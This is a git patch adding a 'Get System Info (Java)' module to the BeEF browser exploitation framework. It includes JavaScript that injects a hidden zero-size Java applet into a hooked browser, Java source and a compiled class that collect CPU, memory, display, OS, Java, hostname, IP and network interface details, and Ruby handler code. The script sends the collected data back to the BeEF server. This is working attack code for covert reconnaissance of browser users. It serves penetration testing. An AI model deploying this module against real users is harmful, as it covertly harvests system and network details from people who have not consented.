From 9170a2cd183a4c4ba4f531dc9c480a2609e5423c Mon Sep 17 00:00:00 2001
From: "bcoles@gmail.com"
 <bcoles@gmail.com@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Fri, 21 Oct 2011 15:26:38 +0000
Subject: [PATCH] Added module: Get System Info (Java)

Retrieves basic information about the host system (such as the number of
processors, amount of memory, screen display modes, operating system
details, Java installation details and network interface names) using an
unsigned Java applet.

Chrome users will be prompted to run the applet.

        o Working:      Opera, Firefox, Safari, Internet Explorer
        o User Notify:  Chrome



git-svn-id: https://beef.googlecode.com/svn/trunk@1376 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 modules/host/get_system_info/command.js       |  51 ++++++
 modules/host/get_system_info/config.yaml      |  26 ++++
 .../host/get_system_info/getSystemInfo.class  | Bin 0 -> 4100 bytes
 .../host/get_system_info/getSystemInfo.java   | 145 ++++++++++++++++++
 modules/host/get_system_info/module.rb        |  31 ++++
 5 files changed, 253 insertions(+)
 create mode 100644 modules/host/get_system_info/command.js
 create mode 100644 modules/host/get_system_info/config.yaml
 create mode 100644 modules/host/get_system_info/getSystemInfo.class
 create mode 100644 modules/host/get_system_info/getSystemInfo.java
 create mode 100644 modules/host/get_system_info/module.rb

diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js
new file mode 100644
index 000000000..10881f259
--- /dev/null
+++ b/modules/host/get_system_info/command.js
@@ -0,0 +1,51 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var internal_counter = 0;
+	var output;
+	var content = "<APPLET code='getSystemInfo' codebase='http://"+beef.net.host+":"+beef.net.port+"/' width=0 height=0 id=getSystemInfo name=getSystemInfo></APPLET>";
+	$j('body').append(content);
+
+	if (beef.browser.isFF()) {
+
+		output = document.getSystemInfo.getInfo();
+		if (output) beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"<br />"));
+
+	} else {
+
+		function waituntilok() {
+			try {
+				output = document.getSystemInfo.getInfo();
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"<br />"));
+				$j('#getSystemInfo').detach();
+				return;
+			} catch (e) {
+				internal_counter++;
+				if (internal_counter > 30) {
+					beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=time out');
+					$j('#getSystemInfo').detach();
+					return;
+				}
+				setTimeout(function() {waituntilok()},1000);
+			}
+		}
+
+		setTimeout(function() {waituntilok()},5000);
+
+	}
+});
+
diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml
new file mode 100644
index 000000000..5a9a52748
--- /dev/null
+++ b/modules/host/get_system_info/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        get_system_info:
+            enable: true
+            category: "Host"
+            name: "Get System Info (Java)"
+            description: "Retrieves basic information about the host system (such as the number of processors, amount of memory, screen display modes, operating system details, Java installation details and network interface names) using an unsigned Java applet.<br /><br />Chrome users will be prompted to run the applet."
+            authors: ["bcoles"]
+            target:
+                working: ["O", "FF", "S", "IE"]
+                user_notify: ["C"]
diff --git a/modules/host/get_system_info/getSystemInfo.class b/modules/host/get_system_info/getSystemInfo.class
new file mode 100644
index 0000000000000000000000000000000000000000..028f9a399fb9e066506ee73573f9cf65d11a30c0
GIT binary patch
literal 4100
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
T=8gZwl^%qO=*<*a!JGaE+?8d#

literal 0
HcmV?d00001

diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java
new file mode 100644
index 000000000..4830eb12a
--- /dev/null
+++ b/modules/host/get_system_info/getSystemInfo.java
@@ -0,0 +1,145 @@
+import java.applet.*;
+import java.awt.*;
+import java.net.*;
+import java.util.*;
+
+public class getSystemInfo extends Applet {
+
+	public getSystemInfo() {
+		super();
+		return;
+	}
+
+	public static String getInfo() {
+
+		String result = "";
+
+		// -- Processor -- //
+		try {
+			// System.out.println("Available processors (cores): "+Integer.toString(Runtime.getRuntime().availableProcessors()));
+			result += "Available processors (cores): "+Integer.toString(Runtime.getRuntime().availableProcessors())+"\n";
+		}
+		catch (Exception exception) {
+			//result += "Exception while gathering processor info: "+exception;
+			result += "Exception while gathering processor info\n";
+		}
+
+		// -- Memory -- //
+		try {
+			long maximumMemory = Runtime.getRuntime().maxMemory();
+			// System.out.println("Maximum memory (bytes): " + (maximumMemory == Long.MAX_VALUE ? "No maximum" : maximumMemory));
+			result += "Maximum memory (bytes): " + (maximumMemory == Long.MAX_VALUE ? "No maximum" : maximumMemory)+"\n";
+			// System.out.println("Free memory (bytes): " + Runtime.getRuntime().freeMemory());
+			result += "Free memory (bytes): " + Runtime.getRuntime().freeMemory()+"\n";
+			// System.out.println("Total memory (bytes): " + Runtime.getRuntime().totalMemory());
+			result += "Total memory (bytes): " + Runtime.getRuntime().totalMemory()+"\n";
+		}
+		catch (Exception exception) {
+			//result += "Exception while gathering memory info: "+exception;
+			result += "Exception while gathering memory info\n";
+		}
+
+		// -- Displays -- //
+		try {
+			GraphicsEnvironment ge = GraphicsEnvironment.getLocalGraphicsEnvironment();
+			// System.out.println("Default Screen: "+ge.getDefaultScreenDevice().getIDstring());
+			result += "Default Screen: "+ge.getDefaultScreenDevice().getIDstring()+"\n";
+			GraphicsDevice[] gs = ge.getScreenDevices();
+			for (int i=0; i<gs.length; i++) {
+				DisplayMode dm = gs[i].getDisplayMode();
+				// System.out.println(gs[i].getIDstring()+" Mode: "+Integer.toString(dm.getWidth())+"x"+Integer.toString(dm.getHeight())+" "+Integer.toString(dm.getBitDepth())+"bit @ "+Integer.toString(dm.getRefreshRate())+"Hertz");
+				result += gs[i].getIDstring()+" Mode: "+Integer.toString(dm.getWidth())+"x"+Integer.toString(dm.getHeight())+" "+Integer.toString(dm.getBitDepth())+"bit @ "+Integer.toString(dm.getRefreshRate())+"Hertz"+"\n";
+			}
+		}
+		catch (Exception exception) {
+			//result += "Exception while gathering display info: "+exception;
+			result += "Exception while gathering display info\n";
+		}
+
+		// -- OS -- //
+		try {
+			// System.out.println("OS Name: "+System.getProperty("os.name"));
+			result += "OS Name: "+System.getProperty("os.name")+"\n";
+			// System.out.println("OS Version: "+System.getProperty("os.version"));
+			result += "OS Version: "+System.getProperty("os.version")+"\n";
+			// System.out.println("OS Architecture: "+System.getProperty("os.arch"));
+			result += "OS Architecture: "+System.getProperty("os.arch")+"\n";
+		}
+		catch (Exception exception) {
+			//result += "Exception while gathering OS info: "+exception;
+			result += "Exception while gathering OS info\n";
+		}
+
+		// -- Browser -- //
+		try {
+			// System.out.println("Browser Name: "+System.getProperty("browser"));
+			result += "Browser Name: "+System.getProperty("browser")+"\n";
+			// System.out.println("Browser Version: "+System.getProperty("browser.version"));
+			result += "Browser Version: "+System.getProperty("browser.version")+"\n";
+		}
+		catch (Exception exception) {
+			//result += "Exception while gathering browser info: "+exception;
+			result += "Exception while gathering browser info\n";
+		}
+
+		// -- Java -- //
+		try {
+			// System.out.println("Java Vendor: "+System.getProperty("java.vendor"));
+			result += "Java Vendor: "+System.getProperty("java.vendor")+"\n";
+			// System.out.println("Java Version: "+System.getProperty("java.version"));
+			result += "Java Version: "+System.getProperty("java.version")+"\n";
+			// System.out.println("Java Specification Version: "+System.getProperty("java.specification.version"));
+			result += "Java Specification Version: "+System.getProperty("java.specification.version")+"\n";
+			// System.out.println("Java VM Version: "+System.getProperty("java.vm.version"));
+			result += "Java VM Version: "+System.getProperty("java.vm.version")+"\n";
+		}
+		catch (Exception exception) {
+			//result += "Exception while gathering java info: "+exception;
+			result += "Exception while gathering java info\n";
+		}
+
+		// -- Network -- //
+		try {
+			// System.out.println("Host Name: " + InetAddress.getLocalHost().getHostName());
+			result += "Host Name: " + java.net.InetAddress.getLocalHost().getHostName()+"\n";
+			// System.out.println("Host Address: " + InetAddress.getLocalHost().getHostAddress());
+			result += "Host Address: " + java.net.InetAddress.getLocalHost().getHostAddress()+"\n";
+			// System.out.println("Network Interfaces:");
+			result += "Network Interfaces:\n";
+			Enumeration networkInterfaces = NetworkInterface.getNetworkInterfaces();
+			while (networkInterfaces.hasMoreElements()) {
+				NetworkInterface networkInterface = (NetworkInterface) networkInterfaces.nextElement();
+				//System.out.println("\t"+networkInterface.toString());
+				result += "\t"+networkInterface.toString()+"\n";
+			}
+		}
+		catch (Exception exception) {
+			//result += "Exception while gathering network info: "+exception;
+			result += "Exception while gathering network info\n";
+		}
+
+		return result;
+
+  }
+
+}
+
+
+
+/*
+        if (beef.browser.isFF()) {
+                var internal_ip = beef.net.local.getLocalAddress();
+                var internal_hostname = beef.net.local.getLocalHostname();
+
+                if(internal_ip && internal_hostname) {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>,
+                                'internal_ip='+internal_ip+'&internal_hostname='+internal_hostname);
+                }
+        } else {
+                //Trying to insert the Beeffeine applet
+                content = "<APPLET code='Beeffeine' codebase='http://"+beef.net.host+":"+beef.net.port+"/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
+                $j('body').append(content);
+                internal_counter = 0;
+                //We have to kick off a loop now, because the user has to accept the running of the applet perhaps
+
+*/
diff --git a/modules/host/get_system_info/module.rb b/modules/host/get_system_info/module.rb
new file mode 100644
index 000000000..aad8ad7aa
--- /dev/null
+++ b/modules/host/get_system_info/module.rb
@@ -0,0 +1,31 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_system_info < BeEF::Core::Command
+  
+	def pre_send
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_system_info/getSystemInfo.class','/getSystemInfo','class')
+	end
+  
+	def post_execute
+		content = {}
+		content['result'] = @datastore['system_info'] if not @datastore['system_info'].nil?
+		content['fail'] = 'No data was returned.' if content.empty?
+		save content
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getSystemInfo.class');
+	end
+  
+end
+